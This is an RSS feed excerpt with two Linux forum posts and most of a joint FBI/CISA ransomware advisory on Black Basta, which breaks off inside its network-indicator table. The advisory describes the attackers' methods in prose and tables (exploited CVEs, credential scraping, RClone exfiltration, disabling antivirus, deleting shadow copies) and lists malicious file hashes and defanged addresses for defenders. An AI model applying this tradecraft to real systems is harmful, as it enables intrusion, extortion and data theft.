<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>About 2-3 months ago, I decided to switch from Windows to Ubuntu (dual-boot). I've enjoyed it quite a lot actually... More than I thought I would. It was like unwrapping a gift that I know is gonna be good.</p> <p>Prologue: I'm a recent computer science graduate who's unemployed and has only ever used Windows. I wanted to use Linux for developing software and games as well as play some games. Here are some of tools and frameworks I used: AWS CLI, Docker, Flask, MERN, VS2022, VSCode, .NET, Unity, Blender.</p> <p>Going into it, I researched a ton. Reddit posts, Quora, etc. The main thing I took from them was:</p> <ul> <li>There's a learning curve. You have to get used to doing thing from terminal (which I was planning on anyway. That is what excited me about it)</li> <li>Ubuntu and Linux Mint seemed to be the best for starters.</li> <li>Everyone hates Snap. Still don't realllllly understand the hate. But I don't consider myself a Linux, or rather, a Ubuntu fanatic... yet. So I don't really care too much I guess.</li> </ul> <p>Considering I write "ubuntu-latest" in my GitHub Actions scripts, it seemed like a logical choice.</p> <p><strong>Initial thoughts</strong><br> Installing it was pretty straightforward. I thought the "Activities" panel was very cool. Managing multiple desktop-like environments, each with their own instances of applications, and the ability to switch between them instantaneously? Yes. Please. No more having to have 500 chrome windows open and trying to find out which one's the one I'm looking for! I just simply have it setup so that every Activity is set for something specific.</p> <p>Having a ChatBot like ChatGPT or Groq is pretty helpful. Although I try not to use it often so that I can bolster my own learning but initially, it was a lot of using that and googling to find out how to download the Linux versions of applications. Little bit of 'sudo apt' here, little bit over there, top it all of with 'sudo apt update'. Done. Doesn't really seem like a learning curve to me. </p> <p>I also obtained this raging boner for "I'M GONNA BE SO DAMN SECURE". So I didn't install chrome nor opera. Didn't attempt to download gmail app or outlook and just stuck with Thunderbird. I went around and found Vivaldi was pretty solid and secure. </p> <p>And then, I found the best thing in the whole wide world. Keyboard. Shortcuts. Literally, I barely touch my mouse anymore. I feel disgusted to do so. Who wants to touch rodents anyway? </p> <p>Software Development related thoughts<br> Honestly, FOR ME, the most important thing was: I don't want to use multiple different CLIs. No more switching from PowerShell to Bash to CMD. On windows, I'd have to rotate between these 3 because often times a command worked on one terminal but didn't on the other. Absolutely. Painful. On Ubuntu... pfft... light work. </p> <p>I think the most painful thing from the entire setup process was trying to setup and connect OneDrive. It took a solid 3-4 days to figure it out. Initially, I thought I'd just access the OneDrive web whenever I needed to but that quickly changed since it was getting very annoying. Ubuntu 24.04 apparently allows you to connect to Office365 account but it wouldn't let me connect my university account (said I needed admin privileges). After a lot of searching, I found RClone which solved my problem.</p> <p>Using Docker and AWS CLI has become incredible easier because I've had to get used to using the terminal so it kind of forced me to learn how to properly use grep and even RegEx. </p> <p>Everything else was pretty much the same. VSCode, MERN, Python, and even .NET. Except for... Unity, video games, and streaming. Which brings me to...</p> <p>Problems:<br> Unity is a pain to use. I installed it. Tried to connect it to VSCode. Didn't work. Spent around an entire day trying to contact people on discord and reddit but to no avail. Eventually got VSCode to work with it but Intellisense would not work. After another 2 days of trying to get that to work, I gave up. Just not worth the time. Instead, I actually started learning GoDot which seemed incredibly more intuitive and fun to develop games in. So even this downside kinda became an upside. </p> <p>Video games are simply unplayable. Yes, I have all the NVIDIA graphics drivers installed, everything that needs to be there is there and everything that needs to be configured (as far as ik) has been configured. I tried running Overwatch 2 and ended up with 25 FPS. I have a pretty solid gaming PC so that is absolutely crazy. I thought I'd play Elden Ring on it but that is definitely gonna crash the PC xD. So playing games seems completely out the window on Ubuntu. </p> <p>Discord. Huh... I think the most heartbreaking and disappointing thing (which I hope is only on Ubuntu) is the fact that I can't share audio through Discord when I share my screen. That one hurt. I installed Vesktop but that was horrible. I'd share my screen but it was use up so much of my bandwidth (even on low settings) and my friends from across the planet (that would normally be able to view my streams with no issues) could barely load the video. I forgot what the other solution was that allowed you to share audio but apparently that's no longer being supported and that git repository itself refers to Vesktop. </p> <p>GoDot seems to work well but the actual gameplay of the game looks... choppy. If I try doing some processor function stuff, then the application sort of hangs for a brief, but noticeable, moment. </p> <p>I began having some weird performance issues in Ubuntu recently. When I use GoDot and then close it, open Vivaldi for some videos, do some code, update docker images, push to git that runs automated pipelines, etc. ubuntu seems to lag. Like Vivaldi would freeze sometimes. Sometimes VSCode would crash. Sometimes GoDot would have trouble starting up. Which brings me to my set of questions.</p> <p>Questions</p> <ul> <li>Is it Ubuntu that is causing issues with Unity and discord streaming? If so, how would I find that out? What distro does not have this problem?</li> <li>I've seen people say that Ubuntu is fine for video games but it seems like the video games I'm asking for are too much for it to handle? Am I wrong? SHOULD it be capable of handling Elden Ring or any AAA games? </li> <li>I want to try out another distro but not without a good reason. Solely from a development POV, are there any pros or cons to using another distro over Ubuntu?</li> <li>Are the issues I mentioned related to Linux itself or are they distro specific? Would, for example, switching to some Redhat distro like Fedora or Arch-based distro like Arch Linux help? </li> </ul> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/TheDarkPapa"> /u/TheDarkPapa </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1dkxfnx/review_on_ubuntu_and_a_few_questions_from_a/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1dkxfnx/review_on_ubuntu_and_a_few_questions_from_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dell Chromebook 11 3120 (Candy) with openSUSE Tumbleweed]]></title>
<description><![CDATA[I'm running TW KDE on Asus C300, similar specs and similar use case.  My set up is with the chromebook keyboard layout, zram swap, internal storage compression and rclone to mount cloud storage.    submitted by    /u/gabriel_3   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/2185460/linux-tipps/dell-chromebook-11-3120-candy-with-opensuse-tumbleweed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2185460/linux-tipps/dell-chromebook-11-3120-candy-with-opensuse-tumbleweed/</guid>
<pubDate>Mon, 17 Jun 2024 21:31:17 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I'm running TW KDE on Asus C300, similar specs and similar use case. </p> <p>My set up is with the chromebook keyboard layout, zram swap, internal storage compression and <code>rclone</code> to mount cloud storage.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/gabriel_3"> /u/gabriel_3 </a> <br> <span><a href="https://cubiclenate.com/2024/06/17/dell-chromebook-11-3120-candy-with-opensuse-tumbleweed/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1di6kaj/dell_chromebook_11_3120_candy_with_opensuse/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[#StopRansomware: Black Basta]]></title>
<description><![CDATA[SUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics,...]]></description>
<link>https://tsecurity.de/de/2128903/it-security-nachrichten/stopransomware-black-basta/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2128903/it-security-nachrichten/stopransomware-black-basta/</guid>
<pubDate>Mon, 29 Apr 2024 16:38:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3><strong>SUMMARY</strong></h3>
<p><em><strong>Note</strong>: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="https://www.cisa.gov/stopransomware" title="#StopRansomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
<p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the authoring organizations) are releasing this joint CSA to provide information on Black Basta, a ransomware variant whose actors have encrypted and stolen data from at least 12 out of 16 critical infrastructure sectors, including the Healthcare and Public Health (HPH) Sector.</p>
<p>This joint CSA provides TTPs and IOCs obtained from FBI investigations and third-party reporting. Black Basta is considered a ransomware-as-a-service (RaaS) variant and was first identified in April 2022. Black Basta affiliates have impacted a wide range of businesses and critical infrastructure in North America, Europe, and Australia. As of May 2024, Black Basta affiliates have impacted over 500 organizations globally.</p>
<p>Black Basta affiliates use common initial access techniques—such as phishing and exploiting known vulnerabilities—and then employ a double-extortion model, both encrypting systems and exfiltrating data. Ransom notes do not generally include an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instructs them to contact the ransomware group via a <code>.onion</code> URL (reachable through the Tor browser). Typically, the ransom notes give victims between 10 and 12 days to pay the ransom before the ransomware group publishes their data on the Black Basta TOR site, Basta News.</p>
<p>Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions. The authoring organizations urge HPH Sector and all critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA to reduce the likelihood of compromise from Black Basta and other ransomware attacks. Victims of ransomware should report the incident to their local FBI field office or CISA (see the Reporting section for contact information).</p>
<h3><strong>TECHNICAL DETAILS</strong></h3>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v15/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&amp;CK for Enterprise</a> framework, version 15. See the MITRE ATT&amp;CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
<h4><strong>Initial Access</strong></h4>
<p>Black Basta affiliates primarily use spearphishing [<a href="https://attack.mitre.org/versions/v15/techniques/T1566/001/" title="Phishing: Spearphishing Attachment">T1566</a>] to obtain initial access. According to cybersecurity researchers, affiliates have also used <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-242a" title="Identification and Disruption of QakBot Infrastructure">Qakbot</a> during initial access.[<a href="https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/" title="Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor">1</a>]</p>
<p>Starting in February 2024, Black Basta affiliates began exploiting ConnectWise vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-1709" title="CVE-2024-1709">CVE-2024-1709</a> [<a href="https://cwe.mitre.org/data/definitions/288.html" title="CWE-288: Authentication Bypass Using an Alternate Path or Channel">CWE-288</a>] [<a href="https://attack.mitre.org/versions/v15/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>]. In some instances, affiliates have been observed abusing valid credentials [<a href="https://attack.mitre.org/versions/v15/techniques/T1078/" title="Valid Accounts">T1078</a>].</p>
<h4><strong>Discovery and Execution</strong></h4>
<p>Black Basta affiliates use tools such as SoftPerfect network scanner (<code>netscan.exe</code>) to conduct network scanning. Cybersecurity researchers have observed affiliates conducting reconnaissance using utilities with innocuous file names such as <code>Intel</code> or <code>Dell</code>, left in the root drive <code>C:\</code> [<a href="https://attack.mitre.org/versions/v15/techniques/T1036/" title="Masquerading">T1036</a>].[<a href="https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/" title="Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor">1</a>]</p>
<h4><strong>Lateral Movement</strong></h4>
<p>Black Basta affiliates use tools such as BITSAdmin and PsExec, along with Remote Desktop Protocol (RDP), for lateral movement. Some affiliates also use tools like Splashtop, Screen Connect, and Cobalt Strike beacons to assist with remote access and lateral movement.</p>
<h4><strong>Privilege Escalation and Lateral Movement</strong></h4>
<p>Black Basta affiliates use credential scraping tools like Mimikatz for privilege escalation. According to cybersecurity researchers, Black Basta affiliates have also exploited ZeroLogon (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472" title="CVE-2020-1472">CVE-2020-1472</a>, [<a href="https://cwe.mitre.org/data/definitions/330.html" title="CWE-330: Use of Insufficiently Random Values">CWE-330</a>]), NoPac (<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42278" title="CVE-2021-42278">CVE-2021-42278</a> [<a href="https://cwe.mitre.org/data/definitions/20.html" title="CWE-20: Improper Input Validation">CWE-20</a>] and <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42287" title="CVE-2021-42287">CVE-2021-42287</a> [<a href="https://cwe.mitre.org/data/definitions/269.html" title="CWE-269: Improper Privilege Management">CWE-269</a>]), and PrintNightmare (<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-34527" title="CVE-2021-34527">CVE-2021-34527</a>, [<a href="https://cwe.mitre.org/data/definitions/269.html" title="CWE-269: Improper Privilege Management">CWE-269</a>]) vulnerabilities for local and Windows Active Domain privilege escalation [<a href="https://attack.mitre.org/versions/v15/techniques/T1068/" title="Exploitation for Privilege Escalation">T1068</a>].[<a href="https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/" title="Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor">1</a>],[<a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta" title="Ransomware Spotlight: Black Basta">2</a>]</p>
<h4><strong>Exfiltration and Encryption</strong></h4>
<p>Black Basta affiliates use RClone to facilitate data exfiltration prior to encryption. Prior to exfiltration, cybersecurity researchers have observed Black Basta affiliates using PowerShell [<a href="https://attack.mitre.org/versions/v15/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>] to disable antivirus products, and in some instances, deploying a tool called Backstab, designed to disable endpoint detection and response (EDR) tooling [<a href="https://attack.mitre.org/versions/v15/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a>].[<a href="https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis" title="Black Basta - Technical Analysis">3</a>] Once antivirus programs are terminated, a ChaCha20 algorithm with an RSA-4096 public key fully encrypts files [<a href="https://attack.mitre.org/versions/v15/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>]. A <code>.basta</code> or otherwise random file extension is added to file names and a ransom note titled <code>readme.txt</code> is left on the compromised system.[<a href="https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/black-basta" title="Who Is Black Basta?">4</a>] To further inhibit system recovery, affiliates use the <code>vssadmin.exe</code> program to delete volume shadow copies [<a href="https://attack.mitre.org/versions/v15/techniques/T1490/" title="Inhibit System Recovery">T1490</a>].[<a href="https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/" title="Threat Assessment: Black Basta Ransomware">5</a>]</p>
<h4><strong>Leveraged Tools</strong></h4>
<p>See Table 1 for publicly available tools and applications used by Black Basta affiliates. This includes legitimate tools repurposed for their operations.</p>
<p><strong>Disclaimer:</strong> Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 1: Tools Used by Black Basta Affiliates</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Tool Name</strong></th>
<th role="columnheader"><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>BITSAdmin</td>
<td>A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers.</td>
</tr>
<tr>
<td>Cobalt Strike</td>
<td>A penetration testing tool used by security professions to test the security of networks and systems. Black Basta affiliates have used it to assist with lateral movement and file execution.</td>
</tr>
<tr>
<td>Mimikatz</td>
<td>A tool that allows users to view and save authentication credentials such as Kerberos tickets. Black Basta affiliates have used it to aid in privilege escalation.</td>
</tr>
<tr>
<td>PSExec</td>
<td>A tool designed to run programs and execute commands on remote systems.</td>
</tr>
<tr>
<td>PowerShell</td>
<td>A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.</td>
</tr>
<tr>
<td>RClone</td>
<td>A command line program used to sync files with cloud storage services such as Mega.</td>
</tr>
<tr>
<td>SoftPerfect</td>
<td>A network scanner (<code>netscan.exe</code>) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters. </td>
</tr>
<tr>
<td>ScreenConnect</td>
<td>Remote support, access, and meeting software that allows users to control devices remotely over the internet.</td>
</tr>
<tr>
<td>Splashtop</td>
<td>Remote desktop software that allows remote access to devices for support, access, and collaboration.</td>
</tr>
<tr>
<td>WinSCP</td>
<td>Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Black Basta affiliates have used it to transfer data from a compromised network to actor-controlled accounts.</td>
</tr>
</tbody>
</table>
<h3><strong>MITRE ATT&amp;CK TACTICS AND TECHNIQUES</strong></h3>
<p>See Tables 2–6 for all referenced threat actor tactics and techniques in this advisory.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 2: Black Basta ATT&amp;CK Techniques for Initial Access</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Phishing</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1566/" title="Phishing">T1566</a></td>
<td>Black Basta affiliates have used spearphishing emails to obtain initial access.</td>
</tr>
<tr>
<td>Exploit Public-Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v12/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a></td>
<td>Black Basta affiliates have exploited ConnectWise vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-1709" title="CVE-2024-1709">CVE-2024-1709</a> to obtain initial access.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 3: Black Basta ATT&amp;CK Techniques for Privilege Escalation</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploitation for Privilege Escalation</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1068/" title="Exploitation for Privilege Escalation">T1068</a></td>
<td>Black Basta affiliates have used credential scraping tools like Mimikatz, Zerologon, NoPac and PrintNightmare for privilege escalation.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 4: Black Basta ATT&amp;CK Techniques for Defense Evasion</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Masquerading</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1036/" title="Masquerading">T1036</a></td>
<td>Black Basta affiliates have conducted reconnaissance using utilities with innocuous file names, such as <code>Intel</code> or <code>Dell</code>, to evade detection.</td>
</tr>
<tr>
<td>Impair Defenses: Disable or Modify Tools</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a></td>
<td>
<p>Black Basta affiliates have deployed a tool called Backstab to disable endpoint detection and response (EDR) tooling.</p>
<p>Black Basta affiliates have used PowerShell to disable antivirus products.</p>
</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 5: Black Basta ATT&amp;CK Techniques for Execution</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Command and Scripting Interpreter: PowerShell</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a></td>
<td>Black Basta affiliates have used PowerShell to disable antivirus products.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 6: Black Basta ATT&amp;CK Techniques for Impact</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Inhibit System Recovery</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1490/" title="Inhibit System Recovery">T1490</a></td>
<td>Black Basta affiliates have used the vssadmin.exe program to delete shadow copies. </td>
</tr>
<tr>
<td>Data Encrypted for Impact</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1486/" title="Data Encrypted for Impact">T1486</a></td>
<td>Black Basta affiliates have used a public key to fully encrypt files. </td>
</tr>
</tbody>
</table>
<p> </p>
</div>
</div>
</div>
</div>
<h3><strong>INDICATORS OF COMPROMISE</strong></h3>
<p>See Table 7 for IOCs obtained from FBI investigations.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 7: Malicious Files Associated with Black Basta Ransomware</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Hash</strong></th>
<th role="columnheader"><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298</td>
<td>rclone.exe</td>
</tr>
<tr>
<td>d3683beca3a40574e5fd68d30451137e4a8bbaca8c428ebb781d565d6a70385e</td>
<td>Winscp.exe</td>
</tr>
<tr>
<td>88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dccccc</td>
<td>DLL</td>
</tr>
<tr>
<td>58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bd</td>
<td>DLL</td>
</tr>
<tr>
<td>39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8ead</td>
<td>DLL</td>
</tr>
<tr>
<td>5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221</td>
<td>DLL</td>
</tr>
<tr>
<td>51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3e</td>
<td>DLL</td>
</tr>
<tr>
<td>d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1</td>
<td>DLL</td>
</tr>
<tr>
<td>5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43</td>
<td>DLL</td>
</tr>
<tr>
<td>05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431</td>
<td>DLL</td>
</tr>
<tr>
<td>a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6</td>
<td>DLL</td>
</tr>
<tr>
<td>86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737</td>
<td>DLL</td>
</tr>
<tr>
<td>07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799</td>
<td>DLL</td>
</tr>
<tr>
<td>96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be</td>
<td><a>ELF</a></td>
</tr>
<tr>
<td>1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779</td>
<td>ELF</td>
</tr>
<tr>
<td>360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98</td>
<td>ELF</td>
</tr>
<tr>
<td>0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94a</td>
<td><a>EXE</a></td>
</tr>
<tr>
<td>9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bc</td>
<td>EXE</td>
</tr>
<tr>
<td>62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087</td>
<td>EXE</td>
</tr>
<tr>
<td>7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59</td>
<td>EXE</td>
</tr>
<tr>
<td>350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bd</td>
<td>EXE</td>
</tr>
<tr>
<td>90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7</td>
<td>EXE</td>
</tr>
<tr>
<td>fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08</td>
<td>EXE</td>
</tr>
<tr>
<td>acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8f</td>
<td>EXE</td>
</tr>
<tr>
<td>d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464d</td>
<td>EXE</td>
</tr>
<tr>
<td>f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4</td>
<td>EXE</td>
</tr>
<tr>
<td>723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224</td>
<td>EXE</td>
</tr>
<tr>
<td>ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e</td>
<td>EXE</td>
</tr>
<tr>
<td>fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435f</td>
<td>EXE</td>
</tr>
<tr>
<td>df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415</td>
<td>EXE</td>
</tr>
<tr>
<td>462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7</td>
<td>EXE</td>
</tr>
<tr>
<td>3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250a</td>
<td>EXE</td>
</tr>
<tr>
<td>5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa</td>
<td>EXE</td>
</tr>
<tr>
<td>37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004</td>
<td>EXE</td>
</tr>
<tr>
<td>3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35</td>
<td>EXE</td>
</tr>
<tr>
<td>17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20</td>
<td>EXE</td>
</tr>
<tr>
<td>42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78</td>
<td>EXE</td>
</tr>
<tr>
<td>882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3</td>
<td>EXE</td>
</tr>
<tr>
<td>e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757</td>
<td>EXE</td>
</tr>
<tr>
<td>0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098e</td>
<td>EXE</td>
</tr>
<tr>
<td>69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944</td>
<td>EXE</td>
</tr>
<tr>
<td>3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622a</td>
<td>EXE</td>
</tr>
<tr>
<td>17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90</td>
<td>EXE</td>
</tr>
<tr>
<td>b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9</td>
<td>EXE</td>
</tr>
</tbody>
</table>
<p>See Tables 8–11 for IOCs obtained from trusted third-party reporting.</p>
<p><strong>Disclaimer:</strong> The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking, as many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 8: Network Indicators</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>IP Address</strong></th>
<th role="columnheader"><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>66.249.66[.]18</td>
<td>0gpw.588027fa.dns.realbumblebee[.]net, dns.trailshop[.]net, dns.artspathgroupe[.]net</td>
</tr>
<tr>
<td>66.249.66[.]18</td>
<td>my.2a91c002002.588027fa.dns.realbumblebee[.]net</td>
</tr>
<tr>
<td>66.249.66[.]18</td>
<td>fy9.39d9030e5d3a8e2352daae2f4cd3c417b36f64c6644a783b9629147a1.afd8b8a4615358e0313bad8c544a1af0d8efcec0e8056c2c8eee96c7.b06d1825c0247387e38851b06be0272b0bd619b7c9636bc17b09aa70.a46890f27.588027fa.dns.realbumblebee[.]net</td>
</tr>
<tr>
<td>95.181.173[.]227</td>
<td>adslsdfdsfmo[.]world</td>
</tr>
<tr>
<td> </td>
